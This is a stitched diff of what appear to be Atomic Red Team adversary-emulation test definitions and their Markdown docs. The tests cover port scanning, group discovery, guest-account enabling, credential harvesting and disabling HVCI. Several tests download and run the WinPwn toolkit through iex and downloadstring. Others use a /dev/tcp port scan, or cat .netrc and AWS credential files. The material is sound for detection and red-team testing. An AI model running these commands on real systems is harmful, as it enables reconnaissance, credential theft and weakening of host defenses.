description: Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
MS17-10 -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: WinPwn - bluekeep
|
||||
auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73
|
||||
description: Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
bluekeep -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: WinPwn - fruit
|
||||
auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98
|
||||
description: Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
fruit -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
attack_technique: T1046
|
||||
display_name: Network Service Discovery
|
||||
atomic_tests:
|
||||
- name: Port Scan
|
||||
auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540
|
||||
description: |
|
||||
Scan ports to check for listening ports.
|
||||
|
||||
Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 192.168.1.1
|
||||
executor:
|
||||
command: |
|
||||
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
|
||||
name: bash
|
||||
- name: Port Scan Nmap
|
||||
auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
|
||||
description: |
|
||||
Scan ports to check for listening ports with Nmap.
|
||||
|
||||
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 192.168.1.1
|
||||
port:
|
||||
description: Ports to scan.
|
||||
type: string
|
||||
default: "80"
|
||||
network_range:
|
||||
description: Network Range to Scan.
|
||||
type: string
|
||||
default: 192.168.1.0/24
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: |
|
||||
Check if nmap command exists on the machine
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
|
||||
- description: |
|
||||
Check if nc command exists on the machine
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)
|
||||
- description: |
|
||||
Check if telnet command exists on the machine
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
|
||||
executor:
|
||||
command: |
|
||||
sudo nmap -sS #{network_range} -p #{port}
|
||||
telnet #{host} #{port}
|
||||
nc -nv #{host} #{port}
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Port Scan NMap for Windows
|
||||
auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
|
||||
description: Scan ports to check for listening ports for the local host 127.0.0.1
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
nmap_url:
|
||||
description: NMap installer download URL
|
||||
type: url
|
||||
default: https://nmap.org/dist/nmap-7.80-setup.exe
|
||||
host_to_scan:
|
||||
description: The host to scan with NMap
|
||||
type: string
|
||||
default: 127.0.0.1
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
NMap must be installed
|
||||
prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}'
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
|
||||
Start-Process $env:temp\nmap-7.80-setup.exe /S
|
||||
executor:
|
||||
command: |-
|
||||
nmap #{host_to_scan}
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Port Scan using python
|
||||
auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
|
||||
description: |
|
||||
Scan ports to check for listening ports with python
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
host_ip:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 127.0.0.1
|
||||
filename:
|
||||
description: Location of the project file
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1046\src\T1046.py
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
Check if python exists on the machine
|
||||
prereq_command: |
|
||||
if (python --version) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
echo "Python 3 must be installed manually"
|
||||
executor:
|
||||
command: |
|
||||
python #{filename} -i #{host_ip}
|
||||
name: powershell
|
||||
- name: WinPwn - spoolvulnscan
|
||||
auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a
|
||||
description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
spoolvulnscan -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: WinPwn - MS17-10
|
||||
auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6
|
||||
description: Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
MS17-10 -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: WinPwn - bluekeep
|
||||
auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73
|
||||
description: Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
bluekeep -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: WinPwn - fruit
|
||||
auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98
|
||||
description: Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
fruit -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: Network Service Discovery for Containers
|
||||
auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
|
||||
description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: |
|
||||
which docker
|
||||
get_prereq_command: |
|
||||
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
|
||||
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: |
|
||||
sudo systemctl status docker --no-pager
|
||||
get_prereq_command: |
|
||||
sudo systemctl start docker
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
|
||||
docker run --name t1046_container -d -t t1046
|
||||
docker exec t1046_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1046_container
|
||||
docker rmi -f t1046
|
||||
name: sh
|
||||
|
||||
@@ -0,0 +1,9 @@
|
||||
FROM ubuntu:latest
|
||||
WORKDIR /
|
||||
RUN apt-get update && apt-get install nmap -y
|
||||
RUN apt-get update && apt-get install -y tcpdump
|
||||
RUN apt-get update && apt-get install net-tools
|
||||
RUN apt-get update && apt-get install iproute2 -y
|
||||
COPY scan.sh /scan.sh
|
||||
RUN chmod +x /scan.sh
|
||||
ENTRYPOINT ["tail", "-f", "/dev/null"]
|
||||
@@ -0,0 +1,12 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Find the IP address of the host machine
|
||||
HOST_IP=$(hostname -I | awk '{print $1}')
|
||||
echo "Running ifconfig"
|
||||
ifconfig
|
||||
echo "Running nmap scan on ${HOST_IP}:"
|
||||
nmap -sV -O ${HOST_IP}
|
||||
echo "Running tcpdump -i on ${HOST_IP}:"
|
||||
tcpdump -i ${HOST_IP} -c 30
|
||||
echo "Running ss -tlwn on ${HOST_IP}:"
|
||||
ss -tuwx
|
||||
@@ -18,6 +18,8 @@ Commands such as <code>net localgroup</code> of the [Net](https://attack.mitre.o
|
||||
|
||||
- [Atomic Test #6 - WMIObject Group Discovery](#atomic-test-6---wmiobject-group-discovery)
|
||||
|
||||
- [Atomic Test #7 - Permission Groups Discovery for Containers- Local Groups](#atomic-test-7---permission-groups-discovery-for-containers--local-groups)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -220,4 +222,60 @@ Get-WMIObject Win32_Group
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - Permission Groups Discovery for Containers- Local Groups
|
||||
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
|
||||
|
||||
**Supported Platforms:** Containers
|
||||
|
||||
|
||||
**auto_generated_guid:** 007d7aa4-8c4d-4f55-ba6a-7c965d51219c
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
```sh
|
||||
docker build -t t1069 $PathtoAtomicsFolder/T1069.001/src/
|
||||
docker run --name t1069_container -d -t t1069
|
||||
docker exec t1069_container ./test.sh
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```sh
|
||||
docker stop t1069_container
|
||||
docker rmi -f t1069
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `sh`!
|
||||
##### Description: Verify docker is installed.
|
||||
##### Check Prereq Commands:
|
||||
```sh
|
||||
which docker
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```sh
|
||||
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
|
||||
```
|
||||
##### Description: Verify docker service is running.
|
||||
##### Check Prereq Commands:
|
||||
```sh
|
||||
sudo systemctl status docker --no-pager
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```sh
|
||||
sudo systemctl start docker
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -99,3 +99,29 @@ atomic_tests:
|
||||
command: |
|
||||
Get-WMIObject Win32_Group
|
||||
name: powershell
|
||||
- name: Permission Groups Discovery for Containers- Local Groups
|
||||
auto_generated_guid: 007d7aa4-8c4d-4f55-ba6a-7c965d51219c
|
||||
description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: |
|
||||
which docker
|
||||
get_prereq_command: |
|
||||
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: |
|
||||
sudo systemctl status docker --no-pager
|
||||
get_prereq_command: |
|
||||
sudo systemctl start docker
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1069 $PathtoAtomicsFolder/T1069.001/src/
|
||||
docker run --name t1069_container -d -t t1069
|
||||
docker exec t1069_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1069_container
|
||||
docker rmi -f t1069
|
||||
name: sh
|
||||
|
||||
@@ -0,0 +1,8 @@
|
||||
FROM ubuntu:20.04
|
||||
WORKDIR /
|
||||
LABEL key="CyberSecurity_project"
|
||||
RUN echo "CyberSecurity_project"
|
||||
RUN apt update
|
||||
COPY test.sh /test.sh
|
||||
RUN chmod +x /test.sh
|
||||
ENTRYPOINT ["tail", "-f", "/dev/null"]
|
||||
@@ -0,0 +1,5 @@
|
||||
#!/bin/sh
|
||||
if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
|
||||
if [ -x "$(command -v id)" ]; then id; else echo "id is missing from the machine. skipping..."; fi;
|
||||
if [ -x "$(command -v getent)" ]; then getent group; else echo "getent is missing from the machine. skipping..."; fi;
|
||||
cat /etc/group
|
||||
@@ -10,6 +10,8 @@ Default accounts are not limited to client machines, rather also include account
|
||||
|
||||
- [Atomic Test #2 - Activate Guest Account](#atomic-test-2---activate-guest-account)
|
||||
|
||||
- [Atomic Test #3 - Enable Guest Account on macOS](#atomic-test-3---enable-guest-account-on-macos)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -99,4 +101,36 @@ net user #{guest_user} /active:no
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Enable Guest Account on macOS
|
||||
This test enables the guest account on macOS using sysadminctl utility.
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```cmd
|
||||
sudo sysadminctl -guestAccount on
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```cmd
|
||||
sudo sysadminctl -guestAccount off
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -65,6 +65,16 @@ atomic_tests:
|
||||
net user #{guest_user} /active:no
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
|
||||
|
||||
|
||||
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: |-
|
||||
sudo sysadminctl -guestAccount on
|
||||
cleanup_command: |-
|
||||
sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
|
||||
@@ -8,32 +8,67 @@ In cloud and/or containerized environments, authenticated user and service accou
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Extract Browser and System credentials with LaZagne](#atomic-test-1---extract-browser-and-system-credentials-with-lazagne)
|
||||
- [Atomic Test #1 - Find AWS credentials](#atomic-test-1---find-aws-credentials)
|
||||
|
||||
- [Atomic Test #2 - Extract passwords with grep](#atomic-test-2---extract-passwords-with-grep)
|
||||
- [Atomic Test #2 - Extract Browser and System credentials with LaZagne](#atomic-test-2---extract-browser-and-system-credentials-with-lazagne)
|
||||
|
||||
- [Atomic Test #3 - Extracting passwords with findstr](#atomic-test-3---extracting-passwords-with-findstr)
|
||||
- [Atomic Test #3 - Extract passwords with grep](#atomic-test-3---extract-passwords-with-grep)
|
||||
|
||||
- [Atomic Test #4 - Access unattend.xml](#atomic-test-4---access-unattendxml)
|
||||
- [Atomic Test #4 - Extracting passwords with findstr](#atomic-test-4---extracting-passwords-with-findstr)
|
||||
|
||||
- [Atomic Test #5 - Find and Access Github Credentials](#atomic-test-5---find-and-access-github-credentials)
|
||||
- [Atomic Test #5 - Access unattend.xml](#atomic-test-5---access-unattendxml)
|
||||
|
||||
- [Atomic Test #6 - WinPwn - sensitivefiles](#atomic-test-6---winpwn---sensitivefiles)
|
||||
- [Atomic Test #6 - Find and Access Github Credentials](#atomic-test-6---find-and-access-github-credentials)
|
||||
|
||||
- [Atomic Test #7 - WinPwn - Snaffler](#atomic-test-7---winpwn---snaffler)
|
||||
- [Atomic Test #7 - WinPwn - sensitivefiles](#atomic-test-7---winpwn---sensitivefiles)
|
||||
|
||||
- [Atomic Test #8 - WinPwn - powershellsensitive](#atomic-test-8---winpwn---powershellsensitive)
|
||||
- [Atomic Test #8 - WinPwn - Snaffler](#atomic-test-8---winpwn---snaffler)
|
||||
|
||||
- [Atomic Test #9 - WinPwn - passhunt](#atomic-test-9---winpwn---passhunt)
|
||||
- [Atomic Test #9 - WinPwn - powershellsensitive](#atomic-test-9---winpwn---powershellsensitive)
|
||||
|
||||
- [Atomic Test #10 - WinPwn - SessionGopher](#atomic-test-10---winpwn---sessiongopher)
|
||||
- [Atomic Test #10 - WinPwn - passhunt](#atomic-test-10---winpwn---passhunt)
|
||||
|
||||
- [Atomic Test #11 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials](#atomic-test-11---winpwn---loot-local-credentials---aws-microsoft-azure-and-google-compute-credentials)
|
||||
- [Atomic Test #11 - WinPwn - SessionGopher](#atomic-test-11---winpwn---sessiongopher)
|
||||
|
||||
- [Atomic Test #12 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials](#atomic-test-12---winpwn---loot-local-credentials---aws-microsoft-azure-and-google-compute-credentials)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Extract Browser and System credentials with LaZagne
|
||||
## Atomic Test #1 - Find AWS credentials
|
||||
Find local AWS credentials from file, defaults to using / as the look path.
|
||||
|
||||
**Supported Platforms:** macOS, Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| file_path | Path to search | string | /|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
```sh
|
||||
find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Extract Browser and System credentials with LaZagne
|
||||
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
@@ -61,7 +96,7 @@ python2 laZagne.py all
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Extract passwords with grep
|
||||
## Atomic Test #3 - Extract passwords with grep
|
||||
Extracting credentials from files
|
||||
|
||||
**Supported Platforms:** macOS, Linux
|
||||
@@ -94,7 +129,7 @@ grep -ri password #{file_path}
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Extracting passwords with findstr
|
||||
## Atomic Test #4 - Extracting passwords with findstr
|
||||
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -123,7 +158,7 @@ ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Access unattend.xml
|
||||
## Atomic Test #5 - Access unattend.xml
|
||||
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
|
||||
If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
|
||||
|
||||
@@ -153,7 +188,7 @@ type C:\Windows\Panther\Unattend\unattend.xml
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Find and Access Github Credentials
|
||||
## Atomic Test #6 - Find and Access Github Credentials
|
||||
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
|
||||
|
||||
**Supported Platforms:** macOS, Linux
|
||||
@@ -181,7 +216,7 @@ for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #6 - WinPwn - sensitivefiles
|
||||
## Atomic Test #7 - WinPwn - sensitivefiles
|
||||
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -211,7 +246,7 @@ sensitivefiles -noninteractive -consoleoutput
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - WinPwn - Snaffler
|
||||
## Atomic Test #8 - WinPwn - Snaffler
|
||||
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -241,7 +276,7 @@ Snaffler -noninteractive -consoleoutput
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #8 - WinPwn - powershellsensitive
|
||||
## Atomic Test #9 - WinPwn - powershellsensitive
|
||||
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -271,7 +306,7 @@ powershellsensitive -consoleoutput -noninteractive
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #9 - WinPwn - passhunt
|
||||
## Atomic Test #10 - WinPwn - passhunt
|
||||
Search for Passwords on this system using passhunt via WinPwn
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -311,7 +346,7 @@ rm -force -recurse .\Vulnerabilities -ErrorAction Ignore
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #10 - WinPwn - SessionGopher
|
||||
## Atomic Test #11 - WinPwn - SessionGopher
|
||||
Launches SessionGopher on this system via WinPwn
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -341,7 +376,7 @@ sessionGopher -noninteractive -consoleoutput
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #11 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials
|
||||
## Atomic Test #12 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials
|
||||
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
@@ -1,6 +1,22 @@
|
||||
attack_technique: T1552.001
|
||||
display_name: 'Unsecured Credentials: Credentials In Files'
|
||||
atomic_tests:
|
||||
- name: Find AWS credentials
|
||||
auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
|
||||
description: |
|
||||
Find local AWS credentials from file, defaults to using / as the look path.
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
type: string
|
||||
default: /
|
||||
executor:
|
||||
command: |
|
||||
find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
|
||||
name: sh
|
||||
- name: Extract Browser and System credentials with LaZagne
|
||||
auto_generated_guid: 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79
|
||||
description: |
|
||||
|
||||
@@ -92,6 +92,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too
|
||||
|
||||
- [Atomic Test #43 - Disable Memory Swap](#atomic-test-43---disable-memory-swap)
|
||||
|
||||
- [Atomic Test #44 - Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-44---disable-hypervisor-enforced-code-integrity-hvci)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -1776,4 +1778,60 @@ sync
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #44 - Disable Hypervisor-Enforced Code Integrity (HVCI)
|
||||
This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
|
||||
The pre-req needs to be ran in order to setup HVCI and have it enabled.
|
||||
We do not recommend running this in production.
|
||||
[Black Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)
|
||||
[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 70bd71e6-eba4-4e00-92f7-617911dbe020
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: HVCI must be enabled
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1 }
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
